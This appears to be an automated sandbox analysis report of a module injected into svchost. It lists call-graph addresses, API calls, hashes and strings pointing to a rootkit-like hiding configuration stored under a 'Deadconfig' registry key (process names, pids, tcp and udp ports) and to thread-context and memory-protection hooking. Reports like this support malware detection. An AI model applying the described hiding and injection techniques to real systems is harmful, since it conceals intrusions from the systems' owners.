2a66130cbcf 7786 2a66130b9f8 __free_lconv_num 13 API calls 7784->7786 7785->7784 7817 2a66130cdd4 7785->7817 7786->7782 7789 2a66130cbca 7790 2a66130b960 _set_errno_from_matherr 13 API calls 7789->7790 7790->7784 7791 2a66130cc2c 7791->7784 7828 2a66130c630 7791->7828 7792 2a66130cbef 7792->7791 7793 2a66130b9f8 __free_lconv_num 13 API calls 7792->7793 7793->7791 7796 2a66130ccc3 7795->7796 7797 2a66130cccd 7796->7797 7843 2a66130aebc EnterCriticalSection 7796->7843 7800 2a66130cd3f 7797->7800 7802 2a66130acb4 33 API calls 7797->7802 7800->7779 7803 2a66130cd57 7802->7803 7806 2a66130b41c 33 API calls 7803->7806 7809 2a66130cdaa 7803->7809 7807 2a66130cd94 7806->7807 7808 2a66130cae0 43 API calls 7807->7808 7808->7809 7809->7779 7811 2a66130ad0c 33 API calls 7810->7811 7812 2a66130c800 7811->7812 7813 2a66130c80c GetOEMCP 7812->7813 7814 2a66130c81e 7812->7814 7816 2a66130c833 7813->7816 7815 2a66130c823 GetACP 7814->7815 7814->7816 7815->7816 7816->7782 7816->7783 7818 2a66130c7ec 35 API calls 7817->7818 7819 2a66130cdff 7818->7819 7821 2a66130ce3c IsValidCodePage 7819->7821 7825 2a66130ce7f _invalid_parameter_noinfo 7819->7825 7820 2a661307d60 _handle_error 8 API calls 7822 2a66130cbc3 7820->7822 7823 2a66130ce4d 7821->7823 7821->7825 7822->7789 7822->7792 7824 2a66130ce84 GetCPInfo 7823->7824 7827 2a66130ce56 _invalid_parameter_noinfo 7823->7827 7824->7825 7824->7827 7825->7820 7844 2a66130c8fc 7827->7844 7912 2a66130aebc EnterCriticalSection 7828->7912 7845 2a66130c939 GetCPInfo 7844->7845 7854 2a66130ca2f 7844->7854 7850 2a66130c94c 7845->7850 7845->7854 7846 2a661307d60 _handle_error 8 API calls 7848 2a66130cac8 7846->7848 7848->7825 7855 2a66130f514 7850->7855 7853 2a66130f9bc 37 API calls 7853->7854 7854->7846 7856 2a66130ad0c 33 API calls 7855->7856 7857 2a66130f556 7856->7857 7858 2a66130d144 MultiByteToWideChar 7857->7858 7860 2a66130f58c 7858->7860 7859 2a66130f593 7861 2a661307d60 _handle_error 8 API calls 7859->7861 7860->7859 7862 2a66130af2c 14 API calls 7860->7862 7864 2a66130f5b8 _invalid_parameter_noinfo 7860->7864 7863 2a66130c9c3 7861->7863 7862->7864 7870 2a66130f9bc 7863->7870 7865 2a66130d144 MultiByteToWideChar 7864->7865 7866 2a66130f650 7864->7866 7867 2a66130f632 7865->7867 7866->7859 7868 2a66130b9f8 __free_lconv_num 13 API calls 7866->7868 7867->7866 7869 2a66130f636 GetStringTypeW 7867->7869 7868->7859 7869->7866 7871 2a66130ad0c 33 API calls 7870->7871 7872 2a66130f9e1 7871->7872 7875 2a66130f6a4 7872->7875 7876 2a66130f6e6 7875->7876 7877 2a66130d144 MultiByteToWideChar 7876->7877 7880 2a66130f730 7877->7880 7878 2a66130f96f 7879 2a661307d60 _handle_error 8 API calls 7878->7879 7881 2a66130c9f6 7879->7881 7880->7878 7882 2a66130af2c 14 API calls 7880->7882 7885 2a66130f763 7880->7885 7881->7853 7882->7885 7883 2a66130d144 MultiByteToWideChar 7884 2a66130f7d5 7883->7884 7886 2a66130f867 7884->7886 7903 2a66130d7e0 7884->7903 7885->7883 7885->7886 7886->7878 7888 2a66130b9f8 __free_lconv_num 13 API calls 7886->7888 7888->7878 7890 2a66130f876 7892 2a66130af2c 14 API calls 7890->7892 7895 2a66130f890 7890->7895 7891 2a66130f824 7891->7886 7893 2a66130d7e0 6 API calls 7891->7893 7892->7895 7893->7886 7894 2a66130d7e0 6 API calls 7897 2a66130f911 7894->7897 7895->7886 7895->7894 7896 2a66130f946 7896->7886 7898 2a66130b9f8 __free_lconv_num 13 API calls 7896->7898 7897->7896 7899 2a66130d1a0 WideCharToMultiByte 7897->7899 7898->7886 7900 2a66130f940 7899->7900 7900->7896 7901 2a66130f9a6 7900->7901 7901->7886 7902 2a66130b9f8 __free_lconv_num 13 API calls 7901->7902 7902->7886 7904 2a66130d3ec try_get_function 5 API calls 7903->7904 7905 2a66130d81e 7904->7905 7906 2a66130d823 7905->7906 7909 2a66130d8bc 7905->7909 7906->7886 7906->7890 7906->7891 7908 2a66130d87f LCMapStringW 7908->7906 7910 2a66130d3ec try_get_function 5 API calls 7909->7910 7911 2a66130d8ea 7910->7911 7911->7908 7342 2a66130a13b 7345 2a66130ac20 7342->7345 7346 2a66130b348 33 API calls 7345->7346 7347 2a66130ac29 7346->7347 7348 2a66130acb4 33 API calls 7347->7348 7349 2a66130ac3f 7348->7349 7350 2a661307f3c 7351 2a661307f60 __scrt_release_startup_lock 7350->7351 7352 2a661309eb9 7351->7352 7353 2a66130b4c4 _set_errno_from_matherr 13 API calls 7351->7353 7354 2a661309ee2 7353->7354 7355 2a66130d940 7356 2a66130d979 7355->7356 7357 2a66130d94a 7355->7357 7357->7356 7358 2a66130d95f FreeLibrary 7357->7358 7358->7357 7504 2a661312bc2 7505 2a661312bdb 7504->7505 7506 2a661312bd1 7504->7506 7508 2a66130af10 LeaveCriticalSection 7506->7508 8032 2a6613060c3 8033 2a6613060d0 8032->8033 8034 2a6613060dc GetThreadContext 8033->8034 8035 2a66130623a 8033->8035 8034->8035 8036 2a661306102 8034->8036 8037 2a66130631e 8035->8037 8038 2a661306261 VirtualProtect FlushInstructionCache 8035->8038 8036->8035 8043 2a661306129 8036->8043 8039 2a66130633e 8037->8039 8042 2a661304800 VirtualFree 8037->8042 8038->8035 8040 2a661305210 3 API calls 8039->8040 8047 2a661306343 8040->8047 8041 2a6613061ad 8042->8039 8043->8041 8044 2a661306186 SetThreadContext 8043->8044 8044->8041 8045 2a661306397 8048 2a661307d60 _handle_error 8 API calls 8045->8048 8046 2a661306357 ResumeThread 8046->8047 8047->8045 8047->8046 8049 2a6613063df 8048->8049 7359 2a66130ab44 7360 2a66130b9f8 __free_lconv_num 13 API calls 7359->7360 7361 2a66130ab54 7360->7361 7362 2a66130b9f8 __free_lconv_num 13 API calls 7361->7362 7363 2a66130ab68 7362->7363 7364 2a66130b9f8 __free_lconv_num 13 API calls 7363->7364 7365 2a66130ab7c 7364->7365 7366 2a66130b9f8 __free_lconv_num 13 API calls 7365->7366 7367 2a66130ab90 7366->7367 7368 2a661302344 GetProcessIdOfThread GetCurrentProcessId 7369 2a6613023ea 7368->7369 7370 2a66130236f CreateFileW 7368->7370 7370->7369 7371 2a6613023a3 WriteFile ReadFile CloseHandle 7370->7371 7371->7369 7509 2a66130dba8 7520 2a66130aebc EnterCriticalSection 7509->7520 8050 2a6613116ab 8051 2a6613116eb 8050->8051 8052 2a661311950 8050->8052 8051->8052 8054 2a661311932 8051->8054 8055 2a66131171f 8051->8055 8053 2a661311946 8052->8053 8057 2a661312230 _log10_special 22 API calls 8052->8057 8058 2a661312230 8054->8058 8057->8053 8061 2a661312250 8058->8061 8062 2a66131226a 8061->8062 8063 2a66131224b 8062->8063 8065 2a661312094 8062->8065 8063->8053 8066 2a6613120d4 _handle_error 8065->8066 8068 2a661312140 _handle_error 8066->8068 8076 2a661312350 8066->8076 8069 2a66131217d 8068->8069 8070 2a66131214d 8068->8070 8083 2a661312688 8069->8083 8079 2a661311f70 8070->8079 8073 2a66131217b _handle_error 8074 2a661307d60 _handle_error 8 API calls 8073->8074 8075 2a6613121a5 8074->8075 8075->8063 8089 2a661312378 8076->8089 8080 2a661311fb4 _handle_error 8079->8080 8081 2a661311fc9 8080->8081 8082 2a661312688 _set_errno_from_matherr 13 API calls 8080->8082 8081->8073 8082->8081 8084 2a6613126a6 8083->8084 8085 2a661312691 8083->8085 8087 2a66130b960 _set_errno_from_matherr 13 API calls 8084->8087 8086 2a66131269e 8085->8086 8088 2a66130b960 _set_errno_from_matherr 13 API calls 8085->8088 8086->8073 8087->8086 8088->8086 8090 2a6613123b7 _raise_exc _clrfp 8089->8090 8091 2a6613125cc RaiseException 8090->8091 8092 2a661312372 8091->8092 8092->8068 8093 2a66130aaac 8096 2a66130a878 8093->8096 8103 2a66130a840 8096->8103 8101 2a66130a7fc 13 API calls 8102 2a66130a8a0 8101->8102 8104 2a66130a850 8103->8104 8105 2a66130a855 8103->8105 8106 2a66130a7fc 13 API calls 8104->8106 8107 2a66130a85c 8105->8107 8106->8105 8108 2a66130a86c 8107->8108 8109 2a66130a871 8107->8109 8110 2a66130a7fc 13 API calls 8108->8110 8109->8101 8110->8109 8111 2a661305cac 8112 2a661305cb3 8111->8112 8113 2a661305ce0 VirtualProtect 8112->8113 8115 2a661305bf0 8112->8115 8114 2a661305d09 GetLastError 8113->8114 8113->8115 8114->8115 8116 2a661312aaf 8117 2a661312ac7 8116->8117 8123 2a661312b32 8116->8123 8117->8123 8124 2a66130977c 8117->8124 8120 2a66130977c 42 API calls 8121 2a661312b29 8120->8121 8122 2a66130ac20 33 API calls 8121->8122 8122->8123 8125 2a661309798 9 API calls 8124->8125 8126 2a661309785 8125->8126 8127 2a66130978a 8126->8127 8128 2a66130acb4 33 API calls 8126->8128 8127->8120 8129 2a661309794 8128->8129 7521 2a6613029b0 7523 2a6613029f5 7521->7523 7522 2a661302a54 7523->7522 7524 2a661303c70 StrCmpNIW 7523->7524 7524->7523 8130 2a661307eb0 8131 2a661307eb9 __scrt_release_startup_lock 8130->8131 8133 2a661307ebd 8131->8133 8134 2a66130a500 8131->8134 8135 2a66130a520 8134->8135 8136 2a66130a537 8134->8136 8137 2a66130a528 8135->8137 8138 2a66130a53e 8135->8138 8136->8133 8140 2a66130b960 _set_errno_from_matherr 13 API calls 8137->8140 8139 2a66130cd58 43 API calls 8138->8139 8142 2a66130a543 8139->8142 8141 2a66130a52d 8140->8141 8143 2a66130b840 _invalid_parameter_noinfo 30 API calls 8141->8143 8165 2a66130c510 GetModuleFileNameW 8142->8165 8143->8136 8148 2a66130a4a0 13 API calls 8149 2a66130a5ad 8148->8149 8150 2a66130a5cd 8149->8150 8151 2a66130a5b5 8149->8151 8153 2a66130a2e0 33 API calls 8150->8153 8152 2a66130b960 _set_errno_from_matherr 13 API calls 8151->8152 8154 2a66130a5ba 8152->8154 8158 2a66130a5e9 8153->8158 8155 2a66130b9f8 __free_lconv_num 13 API calls 8154->8155 8155->8136 8156 2a66130a5ef 8157 2a66130b9f8 __free_lconv_num 13 API calls 8156->8157 8157->8136 8158->8156 8159 2a66130a61b 8158->8159 8160 2a66130a634 8158->8160 8161 2a66130b9f8 __free_lconv_num 13 API calls 8159->8161 8162 2a66130b9f8 __free_lconv_num 13 API calls 8160->8162 8163 2a66130a624 8161->8163 8162->8156 8164 2a66130b9f8 __free_lconv_num 13 API calls 8163->8164 8164->8136 8166 2a66130c556 GetLastError 8165->8166 8167 2a66130c56a 8165->8167 8183 2a66130b8f0 8166->8183 8169 2a66130ad0c 33 API calls 8167->8169 8170 2a66130c598 8169->8170 8171 2a66130c5a9 8170->8171 8173 2a66130d614 5 API calls 8170->8173 8188 2a66130c3fc 8171->8188 8172 2a661307d60 _handle_error 8 API calls 8175 2a66130a55a 8172->8175 8173->8171 8177 2a66130a2e0 8175->8177 8176 2a66130c563 8176->8172 8179 2a66130a31e 8177->8179 8181 2a66130a384 8179->8181 8202 2a66130d108 8179->8202 8180 2a66130a473 8180->8148 8181->8180 8182 2a66130d108 33 API calls 8181->8182 8182->8181 8184 2a66130b4c4 _set_errno_from_matherr 13 API calls 8183->8184 8185 2a66130b901 8184->8185 8186 2a66130b4c4 _set_errno_from_matherr 13 API calls 8185->8186 8187 2a66130b91a 8186->8187 8187->8176 8189 2a66130c439 8188->8189 8190 2a66130c420 8188->8190 8191 2a66130d1a0 WideCharToMultiByte 8189->8191 8192 2a66130c43e 8189->8192 8190->8176 8193 2a66130c491 8191->8193 8192->8190 8194 2a66130b960 _set_errno_from_matherr 13 API calls 8192->8194 8193->8192 8195 2a66130c498 GetLastError 8193->8195 8197 2a66130c4c1 8193->8197 8194->8190 8196 2a66130b8f0 13 API calls 8195->8196 8199 2a66130c4a5 8196->8199 8198 2a66130d1a0 WideCharToMultiByte 8197->8198 8200 2a66130c4e8 8198->8200 8201 2a66130b960 _set_errno_from_matherr 13 API calls 8199->8201 8200->8190 8200->8195 8201->8190 8203 2a66130d090 8202->8203 8204 2a66130ad0c 33 API calls 8203->8204 8205 2a66130d0b4 8204->8205 8205->8179 8206 2a6613030b0 8208 2a6613030e0 8206->8208 8207 2a661303199 8208->8207 8209 2a6613030fd PdhGetCounterInfoW 8208->8209 8209->8207 8210 2a66130311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 8209->8210 8211 2a66130314d StrCmpW 8210->8211 8212 2a661303185 GetProcessHeap HeapFree 8210->8212 8211->8212 8214 2a661303162 8211->8214 8212->8207 8213 2a661303558 12 API calls 8213->8214 8214->8212 8214->8213

                                                        Executed Functions

                                                        Function 000002A661303618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 000002A661303631
                                                        • PathFindFileNameW.SHLWAPI ref: 000002A661303640
                                                          • Part of subcall function 000002A661303C70: StrCmpNIW.KERNELBASE(?,?,?,000002A66130255A), ref: 000002A661303C88
                                                          • Part of subcall function 000002A661303BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303BC6
                                                          • Part of subcall function 000002A661303BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303BF4
                                                          • Part of subcall function 000002A661303BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C16
                                                          • Part of subcall function 000002A661303BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C34
                                                          • Part of subcall function 000002A661303BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C55
                                                        • CreateThread.KERNELBASE ref: 000002A661303687
                                                          • Part of subcall function 000002A661301D3C: GetCurrentThread.KERNEL32 ref: 000002A661301D47
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: d46ac804a58af02ee5119201535612e0b919cc52077020a87d3245cf7316e704
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 39115230F10A044BFB64E721A94EB5A66ECB756F56F9845269807A36D0DF7DC10C8A83
                                                        Function 000002A661303C70 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 18 2a661303c70-2a661303c7b 19 2a661303c7d-2a661303c90 StrCmpNIW 18->19 20 2a661303c95-2a661303c9c 18->20 19->20 21 2a661303c92 19->21 21->20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dead
                                                        • API String ID: 0-1293411866
                                                        • Opcode ID: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction ID: f6d5a0dbe65f5e9c663829fcc500f55916c72a583d24b7860ffd4bca3bdb7618
                                                        • Opcode Fuzzy Hash: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction Fuzzy Hash: 12D0A720B11689CBFF15DFA288CD6603798EB06F15F8C9025C90357214DF1CC94DC715
                                                        Function 000002A6612D2AB8 Relevance: 1.7, APIs: 1, Instructions: 241libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 5fc31caba2d6a33548e2378d5c9ab3eb92b81a219a44c6a4ac0fc3518521d9b1
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0591EFB2F0129087EB64CF25D04CB69B3A9FB55F94F598125DE4A47788DF38D88AC701
                                                        Function 000002A661301AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                          • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                        • SleepEx.KERNELBASE ref: 000002A661301AE3
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 0d3e147137cf3f0668c5a4da59198925d64eba4c138aa6f11c5b45df95f9dcb5
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 95210171B00A0583FB509B23DD4D26963FCAB46FDEF0C54259E0BA7695EF2CC4598292

                                                        Non-executed Functions

                                                        Function 000002A6613081B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: e7c9d3b0f679888c4af4c039d51f87680f2cc789bfb9356e6c215fb0d25bdc0a
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: B0316D72B05B8086EB60DF60E8583DE73A8F789B54F48442ADA4E57B94DF38C54CC705
                                                        Function 000002A66130B62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 9131fd5dbed5217045310b543fde8888276b45c687cb48d7a868e4cff48b437e
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 9D317136714B8086DB60CF25E8497DE73A8F789B64F580125EA8E57B68DF3CC149CB41
                                                        Function 000002A661310018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 74319de8a1f99e33c52a597bb1e6d03644dc4a4b130be96bf2fcd7b27b9672aa
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 8BE1D062B14A808BE700CF64D48D2DD7BB5F346B98F188116DE5BA7B99DF38C42AC741
                                                        Function 000002A6612DB150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: cabe4086090de5c02c394298dc0c680afb927707af4e912d7e18d9f79e66943a
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 2551AE62F1069486EF14CBA6D82C6AD27ADBB5AFD4F888525DE1907B85DF3CC0898301
                                                        Function 000002A661301628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 60ad0d1acc99e365d96b378d3b39321a142c500dcbb11651cc49b0a11ce34215
